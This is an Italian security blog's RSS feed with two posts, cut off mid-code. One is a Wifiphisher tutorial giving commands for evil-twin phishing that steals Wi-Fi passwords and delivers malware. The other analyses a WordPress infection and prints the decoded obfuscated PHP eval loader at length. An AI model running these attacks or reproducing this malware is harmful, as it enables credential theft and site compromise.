<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>attacco Archivi -</title>
	<atom:link href="https://simonetocco.it/tag/attacco/feed/" rel="self" type="application/rss+xml" />
	<link>https://simonetocco.it/tag/attacco/</link>
	<description></description>
	<lastBuildDate>Thu, 22 Dec 2016 15:48:24 +0000</lastBuildDate>
	<language>it-IT</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9</generator>

<image>
	<url>https://simonetocco.it/wp-content/uploads/2020/12/logoSimone-1-150x150.png</url>
	<title>attacco Archivi -</title>
	<link>https://simonetocco.it/tag/attacco/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Wifiphisher: attacchi wifi basati su Man In The Middle</title>
		<link>https://simonetocco.it/wifiphisher-attacchi-wifi-basati-su-man-in-the-middle/</link>
					<comments>https://simonetocco.it/wifiphisher-attacchi-wifi-basati-su-man-in-the-middle/#comments</comments>
		
		<dc:creator><![CDATA[Simone Tocco]]></dc:creator>
		<pubDate>Thu, 22 Dec 2016 15:48:24 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[attacco]]></category>
		<category><![CDATA[man in the middle]]></category>
		<category><![CDATA[wifi]]></category>
		<category><![CDATA[WiFi-phisher]]></category>
		<guid isPermaLink="false">http://simonetocco.it/?p=1503</guid>

					<description><![CDATA[<p>Wifiphisher è un tool di sicurezza che genera attacchi automatizzati utilizzando il canale Wi-Fi al fine di ottenere delle credenziali o infettare la vittima con dei malware. E&#8217; un attacco di ingegneria sociale che non richiede attacchi a forza bruta o attacchi di tipo dizionario ma. Come funziona: Dopo aver raggiunto una posizione di tipo man-in-the-middle utilizzando [&#8230;]</p>
<p>L'articolo <a href="https://simonetocco.it/wifiphisher-attacchi-wifi-basati-su-man-in-the-middle/">Wifiphisher: attacchi wifi basati su Man In The Middle</a> sembra essere il primo su <a href="https://simonetocco.it"></a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><strong>Wifiphisher</strong> è un tool di sicurezza che genera attacchi automatizzati utilizzando il canale Wi-Fi al fine di ottenere delle credenziali o infettare la vittima con dei malware. E&#8217; un attacco di ingegneria sociale che non richiede attacchi a forza bruta o attacchi di tipo dizionario ma.</p>
<h2>Come funziona:</h2>
<p>Dopo aver raggiunto una posizione di tipo man-in-the-middle utilizzando l&#8217;attacco Evil Twin, <strong>Wifiphisher</strong> reindirizza tutte le richieste HTTP ad una pagina di phishing da far visualizzare alla vittima..<br />
Dal punto di vista della vittima, l&#8217;attacco si avvale in tre fasi:</p>
<ol>
<li><strong>La Vittima verrà disconnessa dalla rete. </strong>WiFi-phisher invia continuamente pacchetti di deautenicazione verso tutti i dispositivi Wi-Fi collegati al punto di accesso interrompendo tutte le associazioni esistenti.</li>
<li><strong>La vittima accede al punto di accesso fantasma. </strong>WiFi-phisher capta le impostazioni del punto di accesso creandone uno wireless non autorizzato modellato secondo le impostazioni di quello originale. Genera inoltre un server NAT e un DHCP inoltrando i pacchetti verso i giusti client e le giuste porte. Di conseguenza, le vittime verranno connesse al punto di accesso non autorizzato.</li>
<li><strong>Alla vittima viene somministrata una pagina realistica ma non veritiera.  </strong>WiFi-phisher utilizza un server web  che risponde ai protocolli HTTP e HTTPS. Non appena la vittima richiede una pagina da Internet, Wi-Fi-phisher risponderà con una pagina falsa realistica che richiede credenziali o somministra malware. Questa pagina sarà specificamente realizzata ad hoc per la vittima.</li>
</ol>
<div></div>
<h2>Requisiti di sistema:</h2>
<ul>
<li>Kali Linux.</li>
<li>Una scheda di rete wireless che supporta la modalità AP. I driver dovrebbero sostenere netlink.</li>
<li>Una scheda di rete wireless che supporta la modalità Monitor ed è capace di iniezione. I driver dovrebbero sostenere netlink.</li>
</ul>
<h2>Download e l&#8217;installazione:</h2>
<p>Per installare WiFi-phisher digitare l&#8217;ultima versione di sviluppo i seguenti comandi:</p>
<pre class="wp-code-highlight prettyprint prettyprinted"><span class="pln">https git clone </span><span class="pun">: </span><span class="com">//github.com/sophron/wifiphisher.git </span><span class="pln">

cd wifiphisher </span>

<span class="pln">sudo python setup</span><span class="pun">.</span><span class="pln">py install</span></pre>
<pre class="wp-code-highlight prettyprint prettyprinted"></pre>
<h2>Come usare WiFi-phisher:</h2>
<p><strong>Fase 1:</strong> Eseguire lo strumento digitando wifiphisher</p>
<p>Eseguendo lo strumento senza opzioni, esso troverà le interfacce giuste e in modo interattivo, chiederà all&#8217;utente di scegliere l&#8217;ESSID della rete di destinazione (da una lista con tutti i ESSIDs nella zona intorno a noi), nonché uno scenario di phishing da eseguire.</p>
<pre class="wp-code-highlight prettyprint prettyprinted"><span class="pln">wifiphisher </span><span class="pun">-</span><span class="pln">aI wlan0 </span><span class="pun">-</span><span class="pln">jI wlan4 </span><span class="pun">-</span><span class="pln">p firmware</span><span class="pun">-</span><span class="pln">upgrade</span></pre>
<p>&nbsp;</p>
<p><strong>Fase 2:</strong> Utilizzare wlan0 per il rilascio di pacchetti dal punto di accesso non autorizzato e wlan4 per gli attacchi DoS. Selezionare la rete di destinazione manualmente dalla lista ed eseguire lo scenario &#8220;Aggiornamento firmware&#8221;.</p>
<p><strong>Fase 3:</strong> utile per selezionare manualmente le schede di rete wireless. Lo scenario &#8220;firware Upgrade&#8221; è un modo semplice per ottenere la PSK da una rete protetta da password.</p>
<pre class="wp-code-highlight prettyprint prettyprinted"><span class="pln">wifiphisher </span><span class="pun">--</span><span class="pln">essid CONFERENCE_WIFI </span><span class="pun">-</span><span class="pln">p plugin_update </span><span class="pun">-</span><span class="pln">pK s3cr3tp4ssw0rd</span></pre>
<p><strong>Fase 4:</strong> raccogliere automaticamente le interfacce giuste. L&#8217;Obiettivo del Wi-Fi in questo caso  ha  ESSID &#8220;CONFERENCE_WIFI&#8221; ed esegue lo scenario &#8220;aggiornamento Plugin&#8221;. L&#8217;attacco Evil Twin sarà protetto da password con PSK &#8220;s3cr3tp4ssw0rd&#8221;.</p>
<p><strong>Fase 5</strong> : Utile contro le reti con PSKs descritti (ad esempio a conferenze). Lo scenario &#8220;aggiornamento Plugin&#8221; fornisce un modo semplice per far  scaricare alle vittime gli eseguibili dannosi.</p>
<pre id="quads-ad2" class="quads-location quads-ad2"> <span class="pln">wifiphisher </span><span class="pun">--</span><span class="pln">nojamming </span><span class="pun">--</span><span class="pln">essid </span><span class="str">"FREE WI-FI"</span> <span class="pun">-</span><span class="pln">p oauth</span><span class="pun">-</span><span class="pln">login</span></pre>
<p>&nbsp;</p>
<p><img fetchpriority="high" decoding="async" class="aligncenter size-full wp-image-1505" src="http://simonetocco.it/wp-content/uploads/2016/12/WiFiPhisher.png" alt="wifiphisher" width="800" height="445" srcset="https://simonetocco.it/wp-content/uploads/2016/12/WiFiPhisher.png 800w, https://simonetocco.it/wp-content/uploads/2016/12/WiFiPhisher-300x167.png 300w, https://simonetocco.it/wp-content/uploads/2016/12/WiFiPhisher-768x427.png 768w" sizes="(max-width: 800px) 100vw, 800px" /></p>
<p>&nbsp;</p>
<h2>Disclaimer:</h2>
<p>Non sono responsabile per danni di qualsiasi causa.  L&#8217;utilizzo di WiFi-phisher per attaccare le infrastrutture senza previa conoscenza reciproca da parte dell&#8217;attaccante e della vittima può essere considerata come un&#8217;attività illegale. È responsabilità dell&#8217;utente finale a rispettare tutte le leggi applicabili.</p>
<!--------------------------------------><!-- Conversion Box Made Using : -------><!-- WP Conversion Boxes - -------------><!-- http://wpconversionboxes.com --><!--------------------------------------><div class="wpcb_nothing_offset"></div>

<style>
    
    .wpcb_template_main_1{
        
        background-color: #0faf97;
        width: 100%;
        height: ;
        border-width: ;
        border-color: ;
        margin-top: ;
        margin-bottom: ;
        margin-left: ;
        margin-right: ;
        padding: 20px;
        -webkit-box-shadow: inset 0px 0px 200px -38px rgba(0,0,0,0.5);
        -moz-box-shadow: inset 0px 0px 200px -38px rgba(0,0,0,0.5);
        box-shadow: inset 0px 0px 200px -38px rgba(0,0,0,0.5);     
        
    }
    
    .wpcb_template_main_1 .wpcb_box_heading{
        background-color: ;
        padding-top: 0px;
    }
    
    .wpcb_template_main_1 .wpcb_box_heading_text{
        font-family:    'Arial', serif;
        font-size:      32px;
        line-height:    38px;
        color:          #ffffff;
        text-align:     center;
        text-shadow: 0px 3px 4px rgba(0, 0, 0, 0.25);
        font-weight: 900;
        margin: 0;
    }
    
    .wpcb_template_main_1 .wpcb_box_content_container{
        
    }    
    
    .wpcb_template_main_1 .wpcb_box_content{
        font-family:    Arial;
        font-size:      20px;
        line-height:    24px;
        color:          #ffffff;
        text-align:     center;
        padding: 20px 0px;
    }
    
    .wpcb_template_main_1 .wpcb_box_button_div{
        text-align: center;
    }
    
    .wpcb_template_main_1 .wpcb_box_button_div a.wpcb_box_button, .wpcb_template_main_1 .wpcb_box_button_div button.wpcb_box_button{
        font-family:    Arial;
        font-size:      16px;
        color:          #fff;
        background-color: #4f78f2;
        border-radius: 30px;
        width: ;
        padding: 10px 15px;
    }
    
    .wpcb_button_gradient{background-image : -moz-linear-gradient(top, #4f78f2, #1851f9);background-image : -ms-linear-gradient(top, #4f78f2, #1851f9);background-image : -webkit-gradient(linear, #4f78f2, #1851f9);background-image : -webkit-linear-gradient(top, #4f78f2, #1851f9);background-image : -o-linear-gradient(top, #4f78f2, #1851f9);background-image : linear-gradient(top, #4f78f2, #1851f9);filter : progid:DXImageTransform.Microsoft.gradient(startColorstr=&quot;#4f78f2&quot;, endColorstr=&quot;#1851f9&quot;, GradientType=0);border-color : +#4f78f2 #1851f9 #1851f9;background-color : #4f78f2;}    
        
</style>


<div class="wpcb_template_main wpcb_template_main_1 wpcb_nothing wpcb_nothing" data-fadetime="0">
    <div class="wpcb_box_all_content_container">
        <div class="wpcb_box_content_container">    
            <div class="wpcb_box_heading">
                <div class="wpcb_box_heading_text">Hai bisogno di una consulenza o assistenza?</div>
            </div>            
            <div class="wpcb_box_content">
                Apri un ticket di richiesta, ti risponderò in brevissimo tempo! Chiedere non costa nulla <img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" />            </div>    
            <div class="wpcb_box_button_div">
                <a href="http://simonetocco.it/assistenza-e-consulenza/" target="" id="wpcb_box_button_1" class="wpcb_box_button wpcb_button_gradient">Apri Richiesta</a>
            </div>
        </div>    
    </div>
</div><!------------------------------><!-- Conversion Box Ends Here --><!------------------------------><div class="wpcb-tracker" data-id="3640470" data-boxid="1" data-visitedpage="https://simonetocco.it:443/tag/attacco/feed/" data-visittype="visit"></div><p>L'articolo <a href="https://simonetocco.it/wifiphisher-attacchi-wifi-basati-su-man-in-the-middle/">Wifiphisher: attacchi wifi basati su Man In The Middle</a> sembra essere il primo su <a href="https://simonetocco.it"></a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://simonetocco.it/wifiphisher-attacchi-wifi-basati-su-man-in-the-middle/feed/</wfw:commentRss>
			<slash:comments>3</slash:comments>
		
		
			</item>
		<item>
		<title>Attacco $zend_framework WordPress</title>
		<link>https://simonetocco.it/attacco-zend_framework-wordpress/</link>
		
		<dc:creator><![CDATA[Simone Tocco]]></dc:creator>
		<pubDate>Fri, 21 Jun 2013 17:22:17 +0000</pubDate>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[attacco]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[zend framework]]></category>
		<guid isPermaLink="false">http://www.draco-corporation.com/?p=790</guid>

					<description><![CDATA[<p>Introduzione: Nel Giugno 2013 un nuovo exploit è stato avviato nei confronti del noto CMS WordPress. Il primo sintomo nasce dalla visualizzazione del pannello amministratore che risulta privo di veste grafica. Visionando un qualsiasi file php del Core di WordPress o dei temi utilizzati nel CMS, notiamo che in testa a quasi tutti i file [&#8230;]</p>
<p>L'articolo <a href="https://simonetocco.it/attacco-zend_framework-wordpress/">Attacco $zend_framework WordPress</a> sembra essere il primo su <a href="https://simonetocco.it"></a>.</p>
]]></description>
										<content:encoded><![CDATA[<h3>Introduzione:</h3>
<p>Nel Giugno 2013 un nuovo exploit è stato avviato nei confronti del noto CMS WordPress. Il primo sintomo nasce dalla visualizzazione del pannello amministratore che risulta privo di veste grafica. Visionando un qualsiasi file php del Core di WordPress o dei temi utilizzati nel CMS, notiamo che in testa a quasi tutti i file viene riportato un codice codificato in base64 similare a questo:</p>
<pre lang="php"></pre>
<p>Utilizzando un semplice tool di decodifica, vediamo che lo stesso corrisponde alla seguente porzione di codice PHP:</p>
<pre lang="php">unction eva1fY2bak1cV0ir() {
 //echo start

 if(!isset($GLOBALS["aghex0"])) {
	$GLOBALS["aghex0"]=1;
 $evalsssgqulVBTkZLAch = "";
 if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "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pO31ldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9QVNmN2t5YU5SbWJCUlhXdk5uUmpGVVdKeFdZMlZHSm9VR1p2TldaazlGTjJVMmNoSkdJdUpYZDBWbWM3QlNLcjFFWnVGRWRaOTJjR05XUVpsRWJoWlhaa2dpUlRKa1pQbDBaaFJGYlBCRmFPMUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5MEVTa2htVXpNbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVldQWE5GWm5ORVpWbFZhRk5WYmh4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZMFVDWjJUSmRXWVV4MlRRaG1UTnhXWTJWV1BYWlZjaFpsY3BWMlZVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5UXpWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGwxalFtaEZSVmRFZGlWRlpDeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wSVNQOUVWUzJSMlZKSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDFUWlZwblJ1VjJRc0oyZFJ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUWHBJU1YxVWxVSVpFTVlObFZ3VWxWNVlVVlZKbFJUSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbHRsVUZabFVGTjFYazB6UW1OMlpOQm5kcE5YVHl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BraWNxTmxWakYwYWhSR1daUlhNaFpYWmtnaWRsSm5jME5IS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSXNraUkwWTFSYVZuUlhkbElvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVkdJc2tpSTlrRVdhSkRiSEZtYUtoVldtWjBWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxCQ0xwSUNNNTBXVVA1a1ZVSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbEJDTHBJU1BCNTJZeGduTVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsQkNMcElDYjRKalcybGpNU0pDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoU2VoSm5jaEJTUGdRSFVFaDJiemRFZHVSRWRVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wa2lJNVFIVkxwblVEdGtlUzVtWXNKbGJpWm5UeWdGTVdKaldtWjFSaUJuV0hGMVowMDJZeElGV2FsSGRJbEVjTmhrU3ZSVGJSMWtUeUlsU3NCRFZhWjBNaHBrU1ZSbFJrWmtZb3BGV2FkR055SUdjU05UVzFabGJhSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PXdPcGdDTWtSR0pnMERJWXBIUnloMVRJZDJTbnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PVFmOXRUWHhzRmFqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJOUFDYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0k3a0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDTGxWbGVHNVdaRHhtWTNGRmJoWlhaa2dTWms5R2J3aFhaZzBESW9OV1FNcDFhVUprVnNWWGNuTjNjenhXWTJWR0o3bFNLbFZsZUc1V1pEeG1ZM0ZGYmhaWFprd0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDS3lSM2N5UjNjb0FpWnB0VEtwMFZLaVVsVHhRVlM1WVVWVkpsUlRKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrZ1NaazkyWXVWR2J5Vm5McElTT24xbVNpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWt5UW1OMlpOQm5kcE5YVHl4V1kyVkdKb1VHWnZObWJseG1jMTVTS2lrVFN0cGtJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZtTGRsaUk5a2tSU1ZrUndnbFJTRkRWT1oxYVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVm1McElTUDRRMFlpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSXZKa2JNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVpUW1oRlJWZEVkaVZGWkN4V1kyVkdKdWtpSTkwemRNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVDVzZSa2NZOUVTbnQwWnNGbWRsUmlMcElTUDRrSFRpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSTkwelpQSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDV5VldGWFlXSlhhbGRGVnNGbWRsUkNLdUpFVGpkVVNKOVVXeHRXU0MxVVJYeFdZMlZHSTlBQ2FqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJN2tDTXdnRE14c1NLb1VXYnBSSExwa2lJOTBFU2tobVV6TW1Jb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSzFRV2JzYzFVa2QyUWtWVldwVjBVdEZHYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hYTkZabk5FWlZsVmFGTlZiaHhXWTJWR0piVlVTTDkwVEQ5RkpvUVhaek5YYW9BaWN2QlNLcE1rWmpkV1R3WlhhejFrY3NGbWRsUkNJc0lTYXZJQ0l1QVNLMEJGUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9";$eva1tYlbakBcVSir = "edolpxe";$eva1tYldakBcVSir = "strrev";$eva1tYldakBoVS1r = "ecalper_gerp";$eva1tYidokBoVSjr = ";))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@:eval("");:@(.+)@ie";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "strecrptr";$eva1tYlbakBcVSir = "gao[pxe";$eva1tYldakBoVS1r = "ecrp";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} }  
 
 return $evalsssgqulVBTkZLAch;   }
function gzdecode($eva1fY2bo01zo817) { $eva1fY2bal1cz8i4 = "strpos"; $eva1fY2bol1cz8i5 = "substr"; $eva1fY2bo11cz8i5 = "unpack"; $eva1fY2bo1lcz8i5 = "chr"; $eva1fY2bo1lzc8i5 = "gzinflate";
 $eva1fY2bo01zo317=@ord(@$eva1fY2bol1cz8i5($eva1fY2bo01zo817,3,1));
 $eva1fY2bo01c0317=10;  if($eva1fY2bo01zo317&amp;4) {
 $eva1fY2bo01z0317=@$eva1fY2bo11cz8i5('v',$eva1fY2bol1cz8i5($eva1fY2bo01zo817,10,2));
 $eva1fY2bo01z0317=$eva1fY2bo01z0317[1];
 $eva1fY2bo01c0317+=2+$eva1fY2bo01z0317;
 }  if($eva1fY2bo01zo317&amp;8) {
 $eva1fY2bo01c0317=@$eva1fY2bal1cz8i4($eva1fY2bo01zo817,$eva1fY2bo1lcz8i5(0),$eva1fY2bo01c0317)+1;
